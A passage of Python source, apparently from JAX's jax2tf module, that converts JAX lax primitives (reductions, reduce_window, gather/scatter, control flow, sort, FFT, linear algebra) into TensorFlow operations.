rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None # type: ignore[call-overload]
rhs_out_axis_ids[rhs_axis] = None # type: ignore[call-overload]
batch_ids.append(shared_id)
not_none = lambda x: x is not None
out_axis_ids = list(
filter(not_none, batch_ids + lhs_out_axis_ids + rhs_out_axis_ids))
assert lhs.dtype == rhs.dtype
spec = "{},{}->{}".format("".join(lhs_axis_ids), "".join(rhs_axis_ids),
"".join(out_axis_ids))
return tf.linalg.einsum(spec, lhs, rhs)
tf_impl_with_avals[lax.dot_general_p] = _dot_general
def _broadcast(operand, *, sizes):
result_shape = tf.TensorShape(sizes).concatenate(operand.shape)
return tf.broadcast_to(operand, result_shape)
tf_impl[lax.broadcast_p] = _broadcast
def _broadcast_in_dim(operand, *, shape, broadcast_dimensions):
inshape = [1] * len(shape)
for orig_shape_i, broadcast_dim_i in zip(operand.shape, broadcast_dimensions):
if orig_shape_i != 1:
inshape[broadcast_dim_i] = shape[broadcast_dim_i]
inshape_tf = _eval_shape(inshape)
shape_tf = _eval_shape(shape)
return tf.broadcast_to(tf.reshape(operand, inshape_tf), shape_tf)
tf_impl[lax.broadcast_in_dim_p] = _broadcast_in_dim
def _reshape(operand, *, new_sizes, dimensions):
if dimensions is None:
dimensions = tf.range(tf.rank(operand))
new_sizes_tf = _eval_shape(new_sizes)
return tf.reshape(tf.transpose(operand, dimensions), new_sizes_tf)
tf_impl[lax.reshape_p] = _reshape
def _squeeze(operand, *, dimensions, _in_avals, _out_aval):
op_shape = _in_avals[0].shape
new_shape = tuple(d for i, d in enumerate(op_shape) if i not in dimensions)
new_shape_tf = _eval_shape(new_shape)
return tf.reshape(operand, new_shape_tf)
tf_impl_with_avals[lax.squeeze_p] = _squeeze
def _pad(operand, padding_value, *, padding_config,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del _in_avals
low, high, interior = util.unzip3(padding_config)
if _enable_xla:
out = tfxla.pad(operand, padding_value, low, high, interior)
return out
if all(lo >= 0 and hi >= 0 and i == 0 for lo, hi, i in padding_config):
return tf.pad(
operand,
util.safe_zip(low, high),
mode="CONSTANT",
constant_values=padding_value)
raise _xla_disabled_error("pad", "Only use cases without interior or negative padding can be converted without XLA.")
tf_impl_with_avals[lax.pad_p] = _pad
def _rev(operand, *, dimensions):
return tf.reverse(operand, dimensions)
tf_impl[lax.rev_p] = _rev
tf_impl[lax.select_p] = tf.where
def _transpose(operand, *, permutation):
return tf.transpose(operand, perm=permutation)
tf_impl[lax.transpose_p] = _transpose
axes_to_axis = lambda func: lambda operand, axes: func(operand, axis=axes)
tf_impl[lax.reduce_sum_p] = (
bool_to_int8(axes_to_axis(tf.reduce_sum), argnums=0))
tf_impl[lax.reduce_prod_p] = (
bool_to_int8(axes_to_axis(tf.reduce_prod), argnums=0))
tf_impl[lax.reduce_max_p] = (
bool_to_int8(axes_to_axis(tf.reduce_max), argnums=0))
tf_impl[lax.reduce_min_p] = (
bool_to_int8(axes_to_axis(tf.reduce_min), argnums=0))
tf_impl[lax.reduce_or_p] = axes_to_axis(tf.reduce_any)
tf_impl[lax.reduce_and_p] = axes_to_axis(tf.reduce_all)
def _argminmax(fn, operand, axes, index_dtype):
axis, = axes
output_type = tf.int32
if dtypes.iinfo(index_dtype).bits > 32:
output_type = tf.int64
# TODO(phawkins): handle axes larger than 2^31.
result = fn(operand, axis=axis, output_type=output_type)
return tf.cast(result, to_tf_dtype(index_dtype))
tf_impl[lax.argmin_p] = functools.partial(_argminmax, tf.math.argmin)
tf_impl[lax.argmax_p] = functools.partial(_argminmax, tf.math.argmax)
_add_fn = tf.function(_add, autograph=False)
_ge_fn = tf.function(tf.math.greater_equal, autograph=False)
def _select_and_gather_add(
tangents: TfVal, operand: TfVal, select_prim: core.Primitive,
window_dimensions: Sequence[int], window_strides: Sequence[int],
base_dilation: Sequence[int], window_dilation: Sequence[int],
padding: Sequence[Tuple[int, int]], _in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
# Note: this function follows the pattern in
# jax.lax._select_and_gather_add_translation.
dtype = operand.dtype
nbits = dtypes.finfo(dtype.as_numpy_dtype).bits
# Specializing the function for 64 bits. Only up to 32 bits are supported on TPU,
# we thus intend to let the code throw a different exception on this platform.
max_bits = 64
assert nbits <= max_bits
double_word_reduction = nbits * 2 <= max_bits
const = lambda dtype, x: tf.constant(np.array(x), dtype)
if double_word_reduction:
word_dtype = lax._UINT_DTYPES[nbits]
double_word_dtype = lax._UINT_DTYPES[nbits * 2]
# Packs two values into a tuple.
def pack(a, b):
a = _bitcast_convert_type(a, word_dtype)
b = _bitcast_convert_type(b, word_dtype)
a = _convert_element_type(a, new_dtype=double_word_dtype)
b = _convert_element_type(b, new_dtype=double_word_dtype)
a = tf.bitwise.left_shift(a, const(double_word_dtype, nbits))
return tf.bitwise.bitwise_or(a, b)
# Unpacks the first element of a tuple.
def fst(t):
assert t.dtype == double_word_dtype
st = _shift_right_logical(t, const(double_word_dtype, nbits))
return _bitcast_convert_type(
_convert_element_type(st, new_dtype=word_dtype), dtype)
# Unpacks the second element of a tuple.
def snd(t):
return _bitcast_convert_type(
_convert_element_type(t, new_dtype=word_dtype), dtype)
else:
raise NotImplementedError(
f"TODO: need to pack {nbits * 2} bits but this platform can only go up to {max_bits} bits."
)
assert select_prim is lax.ge_p or select_prim is lax.le_p, select_prim
def reducer(x, y):
which = tf_impl[select_prim]
return tf_impl[lax.select_p](which(fst(x), fst(y)), x=x, y=y)
init = -np.inf if select_prim is lax.ge_p else np.inf
init_identity = lambda x: pack(const(dtype, init), const(dtype, 0))
out = _specialized_reduce_window(
reducer,
init_identity,
pack(operand, tangents),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
base_dilation=base_dilation,
window_dilation=window_dilation,
_in_avals=_in_avals,
_out_aval=_out_aval)
return snd(out)
tf_impl_with_avals[lax.select_and_gather_add_p] = _select_and_gather_add
def _get_shape_from_tensor_or_array(x):
if isinstance(x.shape, tf.TensorShape):
return tuple(x.shape.as_list())
return tuple(x.shape)
def _common_reduce_window(operand, init_val, reducer, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval):
o_spec = tf.TensorSpec((), dtype=operand.dtype)
reducer_fn = tf.function(
reducer, autograph=False).get_concrete_function(o_spec, o_spec)
if not isinstance(init_val, tf.Tensor):
assert not config.jax_enable_checks or _is_tfval(
init_val), f"Non TfVal: {init_val}"
init_val = tf.constant(init_val, operand.dtype)
out = tfxla.reduce_window(
operand,
init_val,
reducer_fn,
window_dimensions,
window_strides,
base_dilations=base_dilation,
window_dilations=window_dilation,
padding=padding)
# TODO: implement shape inference for XlaReduceWindow
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
def _reduce_window(operand, init_value, *, jaxpr, consts, window_dimensions,
window_strides, padding, base_dilation, window_dilation,
_in_avals, _out_aval):
"""TensorFlow implementation of reduce_window.
Args:
operand: N dimensional array containing elements of type T
init_value: starting value of the reduction
jaxpr: the jaxpr corresponding to the reduction function
consts: the constants associated with jaxpr.
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
Returns:
The reduced operand.
"""
assert len(consts) == 0, "Reduction computation cannot have constants"
if not _enable_xla:
raise _xla_disabled_error("reduce_window")
def reducer(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(jaxpr, consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
return _common_reduce_window(operand, init_value, reducer, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval)
# _try_tf_pool currently only supports reduce_window_max and reduce_window_sum.
# TODO(bchetioui): this function is not exhaustive wrt which
# reduce_window_max or reduce_window_sum cases can be translated into a call to
# max_pool or avg_pool. Further investigation is needed to fully flesh it out.
def _try_tf_pool(op_name, operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation) -> TfVal:
def error(msg):
suffix = ("See source code for the precise conditions under which "
"reduce_window can be converted without XLA.")
return _xla_disabled_error("reduce_window", f"{msg} - {suffix}")
dtype = operand.dtype
# Contrarily to the main path, tf.int8 is actually a valid type for
# tf.nn.max_pool.
if op_name == "reduce_window_max" and dtype in [
tf.bool, tf.uint32, tf.uint64, tf.complex64, tf.complex128
]:
raise error(f"tf.nn.max_pool does not support operands of type {dtype}")
if op_name == "reduce_window_sum" and operand.dtype not in [
tf.float16, tf.float32, tf.float64
]:
raise error(f"tf.nn.avg_pool does not support operands of type {dtype}")
has_batch_dim = window_dimensions[0] == 1
has_channel_dim = window_dimensions[-1] == 1
nb_spatial_dimensions = len(operand.shape) - has_batch_dim - has_channel_dim
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
raise error("TensorFlow can only handle pooling for arrays with 1, 2, or "
"3 spatial dimensions")
# TODO(bchetioui): does a simple conversion with another base dilation exist?
if list(base_dilation) != [1] * len(operand.shape):
raise error("Unimplemented support for base dilation")
# TODO(bchetioui): does a simple conversion with another window_dilation
# exist? The whole story seems similar to convolution.
if list(window_dilation) != [1] * len(operand.shape):
raise error("Unimplemented support for window dilation")
if list(padding) != [(0, 0)] * len(operand.shape):
raise error("Unimplemented support for padding")
# ReduceWindow in XLA takes an array of rank N as a parameter, but
# tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default
# shape of the form [batch_size] + input_spatial_shape + [num_channels]
tf_operand = operand
tf_window_dimensions = list(window_dimensions)
tf_window_strides = list(window_strides)
if not has_batch_dim:
tf_operand = tf.expand_dims(tf_operand, 0)
tf_window_dimensions = [1] + tf_window_dimensions
tf_window_strides = [1] + tf_window_strides
if not has_channel_dim:
tf_operand = tf.expand_dims(tf_operand, -1)
tf_window_dimensions.append(1)
tf_window_strides.append(1)
tf_data_format = "N" + "DHW"[-nb_spatial_dimensions:] + "C"
tf_padding = "VALID"
if op_name == "reduce_window_max":
result = tf.nn.max_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
elif op_name == "reduce_window_sum":
avg = tf.nn.avg_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
result = avg * np.prod(tf_window_dimensions)
else:
raise error(f"Unimplemented support for {op_name}")
if not has_batch_dim:
result = tf.squeeze(result, 0)
if not has_channel_dim:
result = tf.squeeze(result, -1)
return result
def _specialized_reduce_window(reducer,
identity,
operand,
*,
window_dimensions,
window_strides,
padding,
base_dilation,
window_dilation,
_in_avals,
_out_aval,
name=None):
"""Wraps the TensorFlow reduce window operation based on a reducer and an
identity function defining the initial value of the reduction depending on
the dtype of the operand.
Args:
reducer: reduction function of type TfVal -> TfVal -> TfVal
identity: function that takes a TensorFlow dtype as a parameter and returns
the starting value of the reduction.
operand: N dimensional array containing elements of type T
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
name: the name of the specialized reduce window primitive for which this
conversion function is called. This information may help to choose a
different conversion path (optional)
Returns:
The reduced operand.
"""
if not _enable_xla and name in ["reduce_window_max", "reduce_window_sum"]:
return _try_tf_pool(name, operand, window_dimensions, window_strides,
padding, base_dilation, window_dilation)
return _common_reduce_window(operand, identity(operand.dtype), reducer,
window_dimensions, window_strides, padding,
base_dilation, window_dilation, _in_avals,
_out_aval)
def _get_max_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(-np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).min
else:
assert dtypes.issubdtype(
numpy_tf_dtype, np.bool_), (f"{tf_dtype} has no defined max identity")
return False
def _get_min_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).max
else:
assert dtypes.issubdtype(
numpy_tf_dtype, np.bool_), (f"{tf_dtype} has no defined min identity")
return True
# pylint: disable=protected-access
tf_impl_with_avals[lax.reduce_window_sum_p] = (
functools.partial(
_specialized_reduce_window, _add, lambda x: 0,
name="reduce_window_sum"))
tf_impl_with_avals[lax.reduce_window_min_p] = (
functools.partial(
_specialized_reduce_window,
tf.math.minimum,
_get_min_identity,
name="reduce_window_min"))
tf_impl_with_avals[lax.reduce_window_max_p] = (
functools.partial(
_specialized_reduce_window,
tf.math.maximum,
_get_max_identity,
name="reduce_window_max"))
tf_impl_with_avals[lax.reduce_window_p] = _reduce_window
# pylint: enable=protected-access
# We use lax_control_flow._cumred_tpu_translation_rule to convert cummax,
# cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is
# O(n^2) on other backends. This may be implemented using associative_scan
# instead to favor different backends.
tf_impl_with_avals[lax_control_flow.cummin_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_min),
multiple_results=False)
tf_impl_with_avals[lax_control_flow.cummax_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_max),
multiple_results=False)
# TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for
# certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes
# will fail when running in compiled mode, but are otherwise compatible with
# the operation. A non-XLA path can thus be defined for all dtypes, though the
# tests will crash.
tf_impl_with_avals[lax_control_flow.cumsum_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_sum),
multiple_results=False)
tf_impl_with_avals[lax_control_flow.cumprod_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_prod),
multiple_results=False)
def _select_and_scatter(operand, source, init_value, select_jaxpr,
select_consts, scatter_jaxpr, scatter_consts,
window_dimensions, window_strides, padding):
raise NotImplementedError("TODO: jax2tf can not convert _select_and_scatter")
tf_impl[lax.select_and_scatter_p] = _select_and_scatter
@functools.partial(bool_to_int8, argnums=(0, 1))
def _select_and_scatter_add(source, operand, *, select_prim, window_dimensions,
window_strides, padding, _in_avals, _out_aval):
if not _enable_xla:
raise _xla_disabled_error("select_and_scatter_add")
init_value = tf.zeros((), operand.dtype)
select_fn = (
tf.function(tf_impl[select_prim], autograph=False).get_concrete_function(
init_value, init_value))
scatter_fn = _add_fn.get_concrete_function(init_value, init_value)
out = tfxla.select_and_scatter(operand, window_dimensions, window_strides,
padding, source, init_value, select_fn,
scatter_fn)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.select_and_scatter_add_p] = _select_and_scatter_add
def _threefry2x32_jax_impl(*args: TfVal, _in_avals, _out_aval):
res = _convert_jax_impl(
functools.partial(
jax._src.random._threefry2x32_lowering, use_rolled_loops=False),
multiple_results=True)(
*args, _in_avals=_in_avals, _out_aval=_out_aval)
return res
tf_impl_with_avals[jax.random.threefry2x32_p] = _threefry2x32_jax_impl
# Use the vmap implementation, otherwise on TPU the performance is really bad
# With use_vmap=True on, we get about the same performance for JAX and jax2tf.
tf_impl_with_avals[random.random_gamma_p] = _convert_jax_impl(
functools.partial(jax._src.random._gamma_impl, use_vmap=True),
multiple_results=False)
def _gather_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.GatherDimensionNumbers()
proto.offset_dims.extend(dimension_numbers.offset_dims)
proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
proto.start_index_map.extend(dimension_numbers.start_index_map)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
@functools.partial(bool_to_int8, argnums=0)
def _gather(operand, start_indices, *, dimension_numbers, slice_sizes,
_in_avals, _out_aval):
"""Tensorflow implementation of gather."""
del _in_avals
if not _enable_xla:
raise _xla_disabled_error("gather")
proto = _gather_dimensions_proto(start_indices.shape, dimension_numbers)
slice_sizes_tf = _eval_shape(slice_sizes)
out = tfxla.gather(operand, start_indices, proto, slice_sizes_tf, False)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.gather_p] = _gather
def _slice(operand, start_indices, limit_indices, strides, _in_avals,
_out_aval):
if strides is None:
strides = [1] * len(start_indices)
slices = tuple(
map(slice, _eval_shape(start_indices), _eval_shape(limit_indices),
_eval_shape(strides)))
out = operand[slices]
# TODO(b/184503314): improve shape inference for __getitem__
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.slice_p] = _slice
def _dynamic_slice(operand, *start_indices, slice_sizes,
_in_avals: Sequence[core.ShapedArray],
_out_aval: core.ShapedArray):
# Here we could use tf.slice. Similarly, for lax.gather we can sometimes use
# tf.gather. But those have different semantics for index-out-of-bounds than
# JAX (and XLA). We have tried to force compilation, by wrapping into
# tf.xla.experimental.compile, or tf.function(jit_compile=True), but
# those solutions are brittle because they do not work when nested into an
# outer compilation (see b/162814494 and b/163006262). They also do not
# survive well being put in a SavedModel. Hence, we now use TFXLA slicing
# and gather ops.
if not _enable_xla:
raise _xla_disabled_error("dynamic_slice")
res = tfxla.dynamic_slice(
operand, tf.stack(start_indices), size_indices=_eval_shape(slice_sizes))
# TODO: implement shape inference for XlaDynamicSlice
res.set_shape(_aval_to_tf_shape(_out_aval))
return res
tf_impl_with_avals[lax.dynamic_slice_p] = _dynamic_slice
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.ScatterDimensionNumbers()
proto.update_window_dims.extend(dimension_numbers.update_window_dims)
proto.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
proto.scatter_dims_to_operand_dims.extend(
dimension_numbers.scatter_dims_to_operand_dims)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
def _scatter(operand, scatter_indices, updates, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del unique_indices, _in_avals
assert len(update_consts) == 0, "Update computation cannot have constants"
if not _enable_xla:
raise _xla_disabled_error("scatter")
proto = _scatter_dimensions_proto(scatter_indices.shape, dimension_numbers)
def update_computation(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(update_jaxpr, update_consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
o_spec = tf.TensorSpec((), dtype=operand.dtype)
xla_update_computation = (
tf.function(update_computation,
autograph=False).get_concrete_function(o_spec, o_spec))
out = tfxla.scatter(
operand,
scatter_indices,
updates,
xla_update_computation,
proto,
indices_are_sorted=indices_are_sorted)
# TODO: implement shape analysis for XlaScatter
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.scatter_p] = _scatter
tf_impl_with_avals[lax.scatter_min_p] = _scatter
tf_impl_with_avals[lax.scatter_max_p] = _scatter
tf_impl_with_avals[lax.scatter_mul_p] = _scatter
tf_impl_with_avals[lax.scatter_add_p] = _scatter
def _dynamic_update_slice(operand, update, *start_indices):
if not _enable_xla:
raise _xla_disabled_error("dynamic_update_slice")
return tfxla.dynamic_update_slice(operand, update, tf.stack(start_indices))
tf_impl[lax.dynamic_update_slice_p] = _dynamic_update_slice
def _cond(index: TfVal, *operands: TfVal, branches: Sequence[core.ClosedJaxpr],
linear: Sequence[bool]) -> Sequence[TfVal]:
del linear
# tf.cond needs lambdas with no arguments.
branches_tf = [
functools.partial(_interpret_jaxpr, jaxpr, *operands)
for jaxpr in branches
]
return tf.switch_case(index, branches_tf)
tf_impl[lax_control_flow.cond_p] = _cond
def _while(*args: TfVal, cond_nconsts: int, cond_jaxpr: core.ClosedJaxpr,
body_nconsts: int, body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
cond_consts, body_consts, init_carry = util.split_list(
args, [cond_nconsts, body_nconsts])
if cond_jaxpr.out_avals[0].shape: # type: ignore[attr-defined]
# The conditional is not a scalar, this must be a batched while
return _batched_cond_while(
*args,
cond_nconsts=cond_nconsts,
cond_jaxpr=cond_jaxpr,
body_nconsts=body_nconsts,
body_jaxpr=body_jaxpr)
# The conditional must return a single value to TF
def cond_tf_func(*args: TfVal) -> TfVal:
pred, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *args)
return pred
body_tf_func = functools.partial(_interpret_jaxpr, body_jaxpr, *body_consts)
return tf.while_loop(cond_tf_func, body_tf_func, init_carry)
def _batched_cond_while(*args: TfVal, cond_nconsts: int,
cond_jaxpr: core.ClosedJaxpr, body_nconsts: int,
body_jaxpr: core.ClosedJaxpr) -> Sequence[TfVal]:
"""Interprets a while_loop with a batched condition.
A batched while has a conditional that returns a tensor of booleans, and
a body that returns a list of tensors whose leading dimensions match those
of the conditional tensor.
We need to turn it into a while with scalar boolean conditional. We will
expand the loop carry to include a prefix with the current tensor boolean
condition. We prepend to the loop the first calculation of the tensor boolean
condition. The loop condition will use a "reduce_any" to calculate a scalar
boolean from the tensor boolean condition. The end of the loop body will
compute the new carry using a "tf.where", and we compute the new tensor
boolean condition.
"""
cond_consts, body_consts, init_carry = util.split_list(
args, [cond_nconsts, body_nconsts])
# Initial computation of batched condition
init_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *init_carry)
assert init_pred_b is not core.unit
def new_cond_tf_func(pred_b: TfVal, *carry: TfVal) -> TfVal:
pred = tf.reduce_any(pred_b, axis=list(range(len(pred_b.shape))))
return pred
def new_body_tf_func(pred_b: TfVal, *carry: TfVal) -> Sequence[TfVal]:
new_carry: Sequence[TfVal] = _interpret_jaxpr(body_jaxpr, *body_consts,
*carry)
def select_one_carry(new_c: TfVal, c: TfVal) -> TfVal:
pred_b_bcast = _broadcast_in_dim(
pred_b,
shape=new_c.shape,
broadcast_dimensions=list(range(len(pred_b.shape))))
return tf.where(pred_b_bcast, new_c, c)
selected_carry: Sequence[TfVal] = list(
util.safe_map(select_one_carry, new_carry, carry))
next_pred_b, = _interpret_jaxpr(cond_jaxpr, *cond_consts, *selected_carry)
return (next_pred_b, *selected_carry)
_, *res_carry = tf.while_loop(new_cond_tf_func, new_body_tf_func,
(init_pred_b, *init_carry))
return res_carry
tf_impl[lax_control_flow.while_p] = _while
# We use the scan impl rule to rewrite in terms of while.
tf_impl_with_avals[lax_control_flow.scan_p] = _convert_jax_impl(
lax_control_flow._scan_impl)
def _top_k(operand: TfVal, k: int) -> Tuple[TfVal, TfVal]:
# Some types originally incompatible with tf.math.top_k can be promoted
# to a compatible type without loss of precision.
def promote_tf_dtype(tf_dtype):
if tf_dtype in [tf.bool, tf.uint8, tf.uint16]:
return tf.uint32
if tf_dtype in [tf.int8, tf.int16]:
return tf.int32
if tf_dtype is tf.float16:
return tf.float32
return None
conversion_dtype = promote_tf_dtype(operand.dtype)
if conversion_dtype:
values, indices = tf.math.top_k(
tf.dtypes.cast(operand, conversion_dtype), k=k, sorted=True)
return tf.dtypes.cast(values, operand.dtype), indices
else:
return tf.math.top_k(operand, k=k, sorted=True)
tf_impl[lax.top_k_p] = _top_k
def _sort(*operands: TfVal, dimension: int, is_stable: bool,
num_keys: int) -> Tuple[TfVal, ...]:
if not _enable_xla:
raise _xla_disabled_error("sort")
assert 1 <= num_keys <= len(operands)
assert 0 <= dimension < len(
operands[0].shape
), f"Invalid {dimension} for ndim {len(operands[0].shape)}"
# The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator_old(*tf_args: TfVal) -> TfVal:
assert len(tf_args) == 2 * len(operands)
# We build a comparison:
# arg[0] < arg[1] or (arg[0] == arg[1] and (arg[2] < arg[3] or ...))
# all the way to arg[2 * num_keys - 2] < arg[2 * num_keys - 1]
inside_comparison = None
for key_idx in range(num_keys - 1, -1, -1):
a = tf_args[2 * key_idx]
b = tf_args[2 * key_idx + 1]
a_lt_b = tf.math.less(a, b)
if inside_comparison is None:
inside_comparison = a_lt_b
else:
inside_comparison = tf.math.logical_or(
a_lt_b, tf.math.logical_and(tf.math.equal(a, b), inside_comparison))
return inside_comparison
comparator_spec: List[tf.TensorSpec] = []
comparator_jax_in_avals: List[core.AbstractValue] = []
for op in operands:
o_spec = tf.TensorSpec((), dtype=op.dtype)
comparator_spec.extend([o_spec, o_spec])
o_aval = core.ShapedArray((), to_jax_dtype(op.dtype))
comparator_jax_in_avals.extend([o_aval, o_aval])
# Use the same comparator that JAX uses when compiling to XLA, to get the
# proper NaN/Inf total order, and the lexicographic ordering.
# The comparator is a 2N-argument TF function, with arguments [2k] and [2k +1]
# corresponding to two scalars from operand[k].
def lexicographic_comparator(*tf_args: TfVal) -> TfVal:
return _convert_jax_impl(
lax._sort_lt_comparator, multiple_results=False)(
*tf_args,
_in_avals=comparator_jax_in_avals,
_out_aval=core.ShapedArray((), np.bool_),
num_keys=num_keys)
xla_comparator_computation = (
tf.function(lexicographic_comparator,
autograph=False).get_concrete_function(*comparator_spec))
results = tfxla.variadic_sort(
operands,
dimension=dimension,
is_stable=is_stable,
comparator=xla_comparator_computation)
return results
tf_impl[lax.sort_p] = _sort
def _fft(x, fft_type, fft_lengths):
FFT, IFFT, RFFT, IRFFT = list(map(xla_client.FftType, [0, 1, 2, 3]))
if fft_type == IRFFT:
expected_lengths = x.shape[-len(fft_lengths):-1] + ((x.shape[-1] - 1) * 2,)
else:
expected_lengths = x.shape[-len(fft_lengths):]
if expected_lengths != fft_lengths:
raise NotImplementedError(
f"Unsupported fft_lengths={fft_lengths} for fft_type={fft_type} of "
f"array with shape={x.shape}.")
tf_funcs = {
FFT: [tf.signal.fft, tf.signal.fft2d, tf.signal.fft3d],
IFFT: [tf.signal.ifft, tf.signal.ifft2d, tf.signal.ifft3d],
RFFT: [tf.signal.rfft, tf.signal.rfft2d, tf.signal.rfft3d],
IRFFT: [tf.signal.irfft, tf.signal.irfft2d, tf.signal.irfft3d]
}
return tf_funcs[fft_type][len(fft_lengths) - 1](x)
tf_impl[lax_fft.fft_p] = _fft
def _qr(operand, full_matrices):
return tf.linalg.qr(operand, full_matrices=full_matrices)
tf_impl[lax_linalg.qr_p] = _qr
def _svd(operand, full_matrices, compute_uv):
result = tf.linalg.svd(operand, full_matrices, compute_uv)
if not compute_uv:
return result,
s, u, v = result
return s, u, tf.linalg.adjoint(v)
tf_impl[lax_linalg.svd_p] = _svd
def _eig(operand: TfVal, compute_left_eigenvectors: bool,
compute_right_eigenvectors: bool):
if compute_left_eigenvectors and compute_right_eigenvectors:
# TODO(bchetioui): didn't find a 100% reliable, easy and satisfying way to
# sort the left eigenvectors in the right order. The jax.numpy.linalg API
# suggests to me that left eigenvectors are anyway seldom used, so I
# think it is acceptable to leave as unimplemented for now.
msg = ("Conversion of eig is not implemented when both "
"compute_left_eigenvectors and compute_right_eigenvectors are set "
"to True.")
raise NotImplementedError(msg)
elif not (compute_left_eigenvectors or compute_right_eigenvectors):
return tuple([tf.linalg.eigvals(operand)])
elif compute_right_eigenvectors:
return tuple(tf.linalg.eig(operand))
else: # compute_left_eigenvectors == True
wH, vl = tf.linalg.eig(tf.linalg.adjoint(operand))
wHH = tf.math.conj(wH)
return tuple([wHH, vl])
tf_impl[lax_linalg.eig_p] = _eig
def _eigh(operand: TfVal, lower: bool, _in_avals, _out_aval):
if operand.shape[-1] == 0:
v, w = operand, tf.reshape(operand, _eval_shape(_in_avals[0].shape[:-1]))
else:
if not lower:
operand = tf.linalg.adjoint(operand)
w, v = tf.linalg.eigh(operand)
cast_type = {
tf.complex64: tf.float32,
tf.complex128: tf.float64
}.get(operand.dtype)
if cast_type is not None:
w = tf.cast(w, cast_type)
return v, w
tf_impl_with_avals[lax_linalg.eigh_p] = _eigh
def _lu(operand: TfVal, _in_avals, _out_aval):
return _convert_jax_impl(lax_linalg._lu_python)(
operand, _in_avals=_in_avals, _out_aval=_out_aval)
tf_impl_with_avals[lax_linalg.lu_p] = _lu
def _triangular_solve(a: TfVal, b: TfVal, *, left_side: bool, lower: bool,
transpose_a: bool, conjugate_a: bool, unit_diagonal: bool,
_in_avals: Sequence[core.ShapedArray],
_out_aval: core.ShapedArray):
if unit_diagonal:
a_aval, _ = _in_avals
a_shape = _eval_shape(a_aval.shape)
a = tf.linalg.set_diag(a, tf.ones(a_shape[:-1], dtype=a.dtype))
if not left_side:
rank = len(a.shape)
transpose_dimensions = list(range(rank - 2)) + [rank - 1, rank - 2]
a = tf.transpose(a, transpose_dimensions)
b = tf.transpose(b, transpose_dimensions)
lower = not lower
# adjoint == transpose for real dtypes, so special care need only be taken
# for complex types.
if a.dtype in [tf.complex64, tf.complex128]:
if (transpose_a and not conjugate_a) or (not transpose_a and conjugate_a):
a = tf.math.conj(a)
result = tf.linalg.triangular_solve(a, b, lower=lower, adjoint=transpose_a)
if not left_side:
result = tf.transpose(result, transpose_dimensions)
return result
tf_impl_with_avals[lax_linalg.triangular_solve_p] = _triangular_solve
def _linear_solve(*args: TfVal, const_lengths, jaxprs, _in_avals, _out_aval):
return _convert_jax_impl(lax_control_flow._custom_linear_solve_impl)(
*args,
const_lengths=const_lengths,
jaxprs=jaxprs,
_in_avals=_in_avals,
_out_aval=_out_aval)
tf_impl_with_avals[lax_control_flow.linear_solve_p] = _linear_solve
def _custom_jvp_call_jaxpr(*args: TfVal, fun_jaxpr: core.ClosedJaxpr,
jvp_jaxpr_thunk: Callable,
num_consts: int) -> Sequence[TfVal]:
# TODO(necula): ensure that there is no AD transformation in scope
